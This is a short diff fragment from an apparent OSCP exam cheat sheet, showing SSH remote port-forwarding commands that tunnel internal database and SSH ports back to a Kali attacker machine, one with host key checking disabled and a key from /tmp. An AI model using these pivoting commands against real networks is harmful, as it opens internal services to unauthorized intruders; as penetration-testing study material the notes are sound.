peterkhe1999/CheatSheet/OSCP/README.md

 ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
 ```

--N flag to specify that we are not running any commands. -f option to request ssh to go to the background.
+* -N: specify that we are not running any commands.
+* -f: request ssh to go to the background.

 ```bash
 ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@10.11.0.4